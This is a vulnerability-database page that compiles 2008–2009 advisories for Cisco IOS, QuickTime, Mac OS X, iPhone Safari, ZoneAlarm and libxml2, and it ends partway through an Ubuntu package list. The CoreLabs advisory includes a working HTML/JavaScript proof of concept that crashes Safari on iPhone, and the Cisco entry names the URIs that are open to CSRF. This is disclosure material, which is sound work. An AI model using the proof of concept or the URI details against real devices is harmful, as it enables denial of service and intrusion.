VARIoT IoT vulnerabilities database


VAR-200809-0053 CVE-2008-4128 Cisco IOS HTTP Administration component multiple cross-site request forgery vulnerabilities

Related entries in the VARIoT exploits database: VAR-E-200809-0317, VAR-E-200809-0315, VAR-E-200809-0316
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Multiple cross-site request forgery (CSRF) vulnerabilities in the HTTP Administration component in Cisco IOS 12.4 on the 871 Integrated Services Router allow remote attackers to execute arbitrary commands via (1) a certain "show privilege" command to the /level/15/exec/- URI, and (2) a certain "alias exec" command to the /level/15/exec/-/configure/http URI. NOTE: some of these details are obtained from third party information.

A remote attacker may execute an arbitrary command via (1) a specific 'show privilege' command sent to the /level/15/exec/- URI, or (2) a specific 'alias exec' command sent to the /level/15/exec/-/configure/http URI.

The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks. The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected.
VAR-200809-0045 CVE-2008-4116 Apple QuickTime and iTunes vulnerable to buffer overflow

CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Buffer overflow in Apple QuickTime 7.5.5 and iTunes 8.0 allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long type attribute in a quicktime tag (1) on a web page or embedded in a (2) .mp4 or (3) .mov file, possibly related to the Check_stack_cookie function and an off-by-one error that leads to a heap-based buffer overflow.

The affected quicktime tag may be (1) on a web page, (2) embedded in a .mp4 file, or (3) embedded in a .mov file.

Apple QuickTime is prone to a buffer-overflow vulnerability. An attacker can exploit this issue by enticing an unsuspecting user to open a specially crafted file. Successfully exploiting this issue allows remote attackers to cause the affected application to crash. Reportedly, code execution is not possible. This issue affects QuickTime 7.5.5; other versions may also be vulnerable.

The <? quicktime type= ?> tag does not correctly handle a long type attribute string. If the user opens the web page or file with the QuickTime or iTunes media player, a single-byte heap overflow can be triggered, resulting in a denial of service or the execution of arbitrary instructions.
VAR-200809-0192 CVE-2008-3618 Apple Mac OS X file sharing allows authenticated remote access to files and directories

CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
The File Sharing pane in the Sharing preference pane in Apple Mac OS X 10.5 through 10.5.4 does not inform users that the complete contents of their own home directories are shared for their own use, which might allow attackers to leverage other vulnerabilities and access files for which sharing was unintended.

The security update addresses a total of 17 new vulnerabilities that affect the Apple Type Services, Directory Services, Finder, ImageIO, Kernel, Login Window, SearchKit, System Configuration, System Preferences, Time Machine, VideoConference, and Wiki Server components of Mac OS X. The advisory also contains security updates for 17 previously reported issues. Attackers could exploit these vulnerabilities to execute arbitrary code, gain access to sensitive information, or cause a denial of service.

II. Impact
The impacts of these vulnerabilities vary. Potential consequences include arbitrary code execution, sensitive information disclosure, denial of service, privilege escalation, or DNS cache poisoning.

III. These and other updates are available via Software Update or via Apple Downloads.

IV. Please send email to <cert@cert.org> with "TA08-260A Feedback VU#547251" in the subject.

Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html>

Revision History: September 16 2008: Initial release
VAR-200809-0191 CVE-2008-3617 Apple Mac OS X file sharing allows authenticated remote access to files and directories

CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Remote Management and Screen Sharing in Apple Mac OS X 10.5 through 10.5.4, when used to set a password for a VNC viewer, displays additional input characters beyond the maximum password length, which might make it easier for attackers to guess passwords that the user believed were longer.

Apple Mac OS X Leopard does not accurately reflect which files and directories are available via sharing. The password field can display more than 8 characters, that is, extra characters are used in the password.

This issue is addressed by the same Apple security update and US-CERT alert TA08-260A (VU#547251) quoted under VAR-200809-0192 above, which covers 17 new vulnerabilities and 17 previously reported issues in Mac OS X components. The updates are available via Software Update or via Apple Downloads.
VAR-200809-0236 CVE-2008-3950 Apple iPhone _web_drawInRect:withFont:ellipsis:alignment:measureOnly function denial of service (DoS) vulnerability

CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Off-by-one error in the _web_drawInRect:withFont:ellipsis:alignment:measureOnly function in WebKit in Safari in Apple iPhone 1.1.4 and 2.0 and iPod touch 1.1.4 and 2.0 allows remote attackers to cause a denial of service (browser crash) via a JavaScript alert call with an argument that lacks breakable characters and has a length that is a multiple of the memory page size, leading to an out-of-bounds read.

Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser. Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users. The following devices and corresponding firmware are affected: iPhone 1.1.4 and 2.0; iPod touch 1.1.4 and 2.0.

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

iPhone Safari JavaScript alert Denial of Service

1. *Advisory Information*

Title: iPhone Safari JavaScript alert Denial of Service
Advisory ID: CORE-2008-0603
Advisory URL: http://www.coresecurity.com/content/iphone-safari-javascript-alert-denial-of-service
Date published: 2008-09-12
Date of last update: 2008-09-12
Vendors contacted: Apple Security
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Client-side Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 31061
CVE Name: CVE-2008-3950

3.

By inserting a special string into the 'alert()' JavaScript method, it is possible to crash Safari via an out-of-bounds memory read that triggers an access violation.

4. *Vulnerable packages*

. iPhone v1.1.4 and v2.0
. iPod touch v1.1.4 and v2.0

5. *Non-vulnerable packages*

. iPhone v2.1
. iPod Touch v2.1

6. *Vendor Information*

The information in this section was provided verbatim by the vendor.

6.1. *Availability*

Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338
Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/

6.2. *Cross-References*

We generally do not publish advisories for denial of service issues unless there are more serious security consequences. As such, we are not planning to describe the fix for this issue, but we do appreciate your having reported it to us. If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222

7. *Credits*

Nicolas Economou from Core Security Technologies discovered and researched this vulnerability.

8.

The vulnerable function is '_web_drawInRect:withFont:ellipsis:alignment:measureOnly: : NSString(WebStringDrawing)', which is one of the functions used by the 'alert()' method in this implementation of JavaScript. The 'alert()' method receives a string parameter to be shown on screen. When this string parameter is large, the library maps the required memory to store it. As the memory page size is 4096 bytes, the reserved memory is rounded up, that is, the rest of the page is marked as reserved but unused. If a string has a length divisible by 4096, it fits exactly in the memory reserved and no bytes are left unused.

When the vulnerable function is called, it calls the method 'WebCore::nextBreakablePosition', which is in charge of searching for "breakable" characters (for example a space, the character "-", etcetera) and returns the position where the first "breakable" character was found. This method takes as parameter the same string passed to 'alert' in JavaScript. In the case that no "breakable" characters are found, it returns the final position of the string plus 1. For example, if the string size is '0x1000' and the function doesn't find anything, it returns position '0x1000', counting from zero.

The crash is generated when the function '_web_drawInRect:withFont:ellipsis:alignment:measureOnly' receives as parameter a large string with a size multiple of 4096 without "breakable" characters and then passes it to the method 'WebCore::nextBreakablePosition'. Once the method returns, the function uses the return value to access the out-of-bounds string position, just outside the memory allocated and possibly located in a non-mapped memory area. The vulnerability is produced by an invalid read access. The fragment of the function where the vulnerability was found is shown:

/-----------
31739CB4 MOV R1, R8 ; R1=string
31739CB8 MOV R2, R10 ; R10=string len
31739CBC MOV R3, R8
31739CC0 MOV R0, R4
31739CC4 BL WebCore::nextBreakablePosition(ushort const*,int,int,bool)
31739CC8 LDR R1, =0x1008
31739CCC MOV R3, R0,LSL#1 ; R0=returned position
31739CD0 MOV R5, R0
31739CD4 LDRH R0, [R4,R3] ; <---- CRASH !!!
31739CD8 ADD R6, R4, R3
31739CDC BL _u_getIntPropertyValue
31739CE0 CMP R0, #0x1D
31739CE4 BHI loc_31739D1C
-----------/

The following proof of concept HTML code generates the string with length multiple of 4096 to demonstrate the bug.

/-----------
<html>
<body>
<form>
<script type="text/javascript" language="JavaScript">
var st = "A";
alert ( "Crashing Safari on iPhone..." );
for ( var d = 1 ; d <= 16 ; d ++ ) {
  st += st;
}
alert ( st );
</script>
</form>
</body>
</html>
-----------/

When debugging Safari on iPhone with 'iphonedbg'[1] the proof-of-concept produces the following output:

/-----------
ACCESS VIOLATION
r0=00010000 r1=00001008 r2=00000041 r3=00020000
r4=02e00000 r5=00010000 r6=00000001 r7=2ffff04c
r8=00000000 r9=3800da94 r10=00010000 r11=001833e0
r12=ffffffff sp=2fffe70c lr=31739cc8 pc=31739cd4
ctrl=60000010
WebCore!-[NSString(WebStringDrawing) _web_drawInRect:withFont:ellipsis:alignment:measureOnly:]+268:
pc=31739cd4 b3 00 94 e1 ldrh r0, [r4, r3]
-----------/

It can be seen that the instruction 'ldrh r0, [r4, r3]' tries to read the memory location pointed to by 'R4+R3', in this case unmapped memory. Making a dump of the memory area accessed, we see the following:

/-----------
31739cd4> db r4+r3-40
02e1ffc0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A.
02e1ffd0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A.
02e1ffe0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A.
02e1fff0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A.
02e20000 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ????????????????
02e20010 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ????????????????
02e20020 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ????????????????
02e20030 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ????????????????
-----------/

9. *Report Timeline*

2008-07-21: Core notifies the vendor of the bug and sends the advisory draft (with PoC). Core states that version 1.1.4 and previous versions are affected.
2008-07-24: Core asks for confirmation of reception of the previous email.
2008-07-24: Vendor acknowledges and states that they will analyze the bug.
2008-07-29: Vendor confirms the existence of the bug, but doesn't consider that this client-side denial-of-service affects the security of the system. It communicates that version 2.0 is also affected and requests to wait until a patch is available before releasing the advisory.
2008-07-29: Core replies that further testing reveals that 2.0 is also affected (crash sent), that the issue is considered by Core as a security problem, and asks for concrete information regarding dates and versions of the patch.
2008-07-29: Vendor confirms that versions 1.1.4 and 2.0.0 are affected, and declines to provide an estimated date for the release of fixed versions at that moment.
2008-07-29: Core requests an estimation of when the update information will be available.
2008-08-04: Vendor replies that the timeframe will be communicated to Core as soon as they have it.
2008-08-26: Core asks for any update of the schedule to fix the DoS, and notifies the Vendor that the publication was rescheduled to September 16th.
2008-09-05: Vendor estimates that their patch and security bulletin would be released early in the week of September 7th.
2008-09-05: Core confirms that the advisory will be released as soon as the security bulletin is sent to Core.
2008-09-08: Core requests a more precise timing from the vendor.
2008-09-08: Vendor confirms that the Apple patch is not going out on Monday 8th, and requests Core to hold off the advisory until the Vendor's security bulletin is out.
2008-09-11: Core requests from the vendor a new date for re-scheduling the publication of advisory CORE-2008-0603, notices that a security update has been released for iPod touch on September 9th without notification to Core and asks for details.
2008-09-12: Vendor responds that the update of September 9th fixes the bug for iPod touch and the update released on Friday 12th fixes it for iPhone.
2008-09-12: Core publishes advisory CORE-2008-0603.

10. *References*

[1] iPhoneDbg Toolkit http://oss.coresecurity.com/projects/iphonedbg.html

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs.

12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of the Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
VAR-200908-0093 CVE-2008-7009 Check Point ZoneAlarm Security Suite multiscan.exe buffer overflow vulnerability

CVSS V2: 6.9
CVSS V3: -
Severity: MEDIUM
Buffer overflow in multiscan.exe in Check Point ZoneAlarm Security Suite 7.0.483.000 and 8.0.020.000 allows local users to execute arbitrary code via a file or directory with a long path. NOTE: some of these details are obtained from third party information.

ZoneAlarm Security Suite is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input when performing virus scans on long directory paths. Remote attackers may leverage this issue to execute arbitrary code with SYSTEM-level privileges and gain complete access to the vulnerable computer. Failed attacks will cause denial-of-service conditions. This issue affects ZoneAlarm Security Suite 7.0.483.000; other versions may also be affected.

ZoneAlarm is a personal computer firewall that protects personal data and privacy.

TITLE: ZoneAlarm Internet Security Suite "multiscan.exe" Buffer Overflow
SECUNIA ADVISORY ID: SA31832
VERIFY ADVISORY: http://secunia.com/advisories/31832/
CRITICAL: Less critical
IMPACT: System access
WHERE: From remote
SOFTWARE:
ZoneAlarm Internet Security Suite 8.x http://secunia.com/advisories/product/19816/
ZoneAlarm Internet Security Suite 7.x http://secunia.com/advisories/product/19815/

DESCRIPTION: Juan Pablo Lopez Yacubian has discovered a vulnerability in ZoneAlarm Internet Security Suite, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error in multiscan.exe when processing input from files passed via the "-f" command line parameter. This can be exploited to cause a buffer overflow by e.g. tricking a user into scanning a file or directory with a specially crafted name via the "Scan with ZoneAlarm Anti-virus" shell extension. Successful exploitation may allow the execution of arbitrary code. The vulnerability is confirmed in versions 7.0.483.000 and 8.0.020.000.

SOLUTION: A solution is not available.

PROVIDED AND/OR DISCOVERED BY: Juan Pablo Lopez Yacubian
VAR-200809-0566 CVE-2008-3529 libxml2 xmlParseAttValueComplex function heap-based buffer overflow vulnerability

CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Heap-based buffer overflow in the xmlParseAttValueComplex function in parser.c in libxml2 before 2.7.0 allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via a long XML entity name.

The 'libxml' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service condition.

The libxml package provides a library of functions that allow users to manipulate XML files, including support for reading, modifying, and writing XML and HTML files.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200812-06
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: libxml2: Multiple vulnerabilities
Date: December 02, 2008
Bugs: #234099, #237806, #239346, #245960
ID: 200812-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
Multiple vulnerabilities in libxml2 might lead to execution of arbitrary code or Denial of Service.

Background
==========
libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project.

Affected packages
=================
-------------------------------------------------------------------
   Package              / Vulnerable  / Unaffected
-------------------------------------------------------------------
 1 dev-libs/libxml2     < 2.7.2-r1    >= 2.7.2-r1

Description
===========
Multiple vulnerabilities were reported in libxml2:

* Andreas Solberg reported that libxml2 does not properly detect recursion during entity expansion in an attribute value (CVE-2008-3281).
* A heap-based buffer overflow has been reported in the xmlParseAttValueComplex() function in parser.c (CVE-2008-3529).
* Christian Weiske reported that predefined entity definitions in entities are not properly handled (CVE-2008-4409).
* Drew Yao of Apple Product Security reported an integer overflow in the xmlBufferResize() function that can lead to an infinite loop (CVE-2008-4225).
* Drew Yao of Apple Product Security reported an integer overflow in the xmlSAX2Characters() function leading to a memory corruption (CVE-2008-4226).

Impact
======
A remote attacker could entice a user or automated system to open a specially crafted XML document with an application using libxml2, possibly resulting in the execution of arbitrary code or high CPU and memory consumption.

Workaround
==========
There is no known workaround at this time.

Resolution
==========
All libxml2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1"

References
==========
[ 1 ] CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281
[ 2 ] CVE-2008-3529 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
[ 3 ] CVE-2008-4409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409
[ 4 ] CVE-2008-4225 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225
[ 5 ] CVE-2008-4226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-06.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

===========================================================
Ubuntu Security Notice USN-815-1 August 11, 2009
libxml2 vulnerabilities
CVE-2008-3529, CVE-2009-2414, CVE-2009-2416
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: libxml2 2.6.24.dfsg-1ubuntu1.5
Ubuntu 8.04 LTS: libxml2 2.6.31.dfsg-2ubuntu1.4
Ubuntu 8.10: libxml2 2.6.32.dfsg-4ubuntu1.2
Ubuntu 9.04: libxml2 2.6.32.dfsg-5ubuntu4.2

After a standard system upgrade you need to restart your sessions to effect the necessary changes.

Details follow:

It was discovered that libxml2 did not correctly handle root XML document element DTD definitions. (CVE-2009-2414)

It was discovered that libxml2 did not correctly parse Notation and Enumeration attribute types. (CVE-2009-2416)

USN-644-1 fixed a vulnerability in libxml2. This advisory provides the corresponding update for Ubuntu 9.04. Original advisory details:

It was discovered that libxml2 did not correctly handle long entity names.
(CVE-2008-3529)

Updated packages for Ubuntu 6.06 LTS:

Updated packages for Ubuntu 8.04 LTS:
http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 259630 143a179bfbcff152d9f33c424ea80229 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 923448 d3ca8a5978632bec93151a892072b5c4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 776284 92d1fb876bb167fccee4e5a6a82e8169 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_powerpc.udeb Size/MD5: 564078 9d75d8f965c320fd17dc2c420aa6e325 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 42060 8bedb52b8485e7b65b930a39a671cbd8 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 816678 55d6f855ea9b7b14f2ce449079360f80 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 841354 b66c89a166c8a92ed136f77e2693249b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 285362 adc160daa3848983f4ddb678c3345199 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 826326 f596d405cff24bfa70d8c2ff81e3439b http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 719830 b0cb8e2bbbec82604b5a562f3e446f78 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_sparc.udeb Size/MD5: 541066 f5796b6b3175b740eb55ab32887c98f1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 36190 1e5ae0d677b95e4f5b69c86ab7207c04 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 793408 c10a54dbfe118a255b353b59fee0c895 
http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 807914 3566e097583445477cad63cd721424f1 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 277520 b0c2ed5aafa41ff970a5d8c40a12d02d Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.diff.gz Size/MD5: 84498 bc3004e4fd1e98246801b2a5741be0f1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.dsc Size/MD5: 1494 5a25281495f4e6650a45f45a5a8526d2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz Size/MD5: 3425843 bb11c95674e775b791dab2d15e630fa4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-4ubuntu1.2_all.deb Size/MD5: 1308242 3aa37d0a971702bda21165e2744d3b15 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 1014608 676fed67244fe42800b527d2d654365f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 777674 72fd0dc6223b0708f936bfbf830b42a4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_amd64.udeb Size/MD5: 607400 82a0a91ff27913e1284ae7799156b9a5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 37346 b71638a425beef5adb16962d2dbf83f8 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 863410 2141203bc6e460099878831efdc9de8e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 858904 3143613cc83f8f3b3fc171291e48f30c 
http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 296128 4f123d82f7393dc6271adee9b0b2154b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 966962 48d67569f459f88564f282c5c7603eca http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 701786 f31b1ec9b00b32aef5dab08de74c1ca5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_i386.udeb Size/MD5: 563618 6c10444d19aa3010ec0b6afc46631442 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 33908 218bd1ab9dbed3bb7e56db1f1ac74a6a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 819242 f2e5722dc46494b105d2e171a7ab8230 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 782502 c6a12f97a9d05c420e87d98f3cebe292 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 261340 c1e353abc1bdf4c56b856228ea92e3ce lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 994030 e6260d0cfcac28075fcbe72036374dc1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 697648 2e04c962dc20e83f635a5bf06fb87691 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_lpia.udeb Size/MD5: 553402 8998361080659f8d3175d3621261805a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 34092 da760a43ac9492e508c6dc6c85499a95 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 808888 
d3708ffd4d87a2c48c6c37badb602ec5 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 776836 ff4dee115d09816a99b2c7ea63e4fd10 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 257710 6e2cf4776d778dc7ce2d2a7c098c5bd7 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 985370 5f1c540dbfecf08d6ccc22798beb7d0d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 793178 980f65e0877f36d1c51241ca6e8a4e79 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_powerpc.udeb Size/MD5: 582030 439fe7ebaebd3e5e3c9ca5b323595da6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 40426 648c47236b411a6b5ccbbe4ca4671af7 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 837942 7a59d92fe6c31895aadc67df56e404b2 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 822784 44a72a4996bca847bea424ad1db4d03b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 283028 9423c0b24aab87ffac1d85615282e38d sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 872662 fcc9c2574a5f8f9aeee5be43cedd9542 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 730988 dab6026cfeee8b30a3d7d7a989621cc1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_sparc.udeb Size/MD5: 551174 de8a4e5e3c69eda8a888e2a4be0d8771 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 36538 
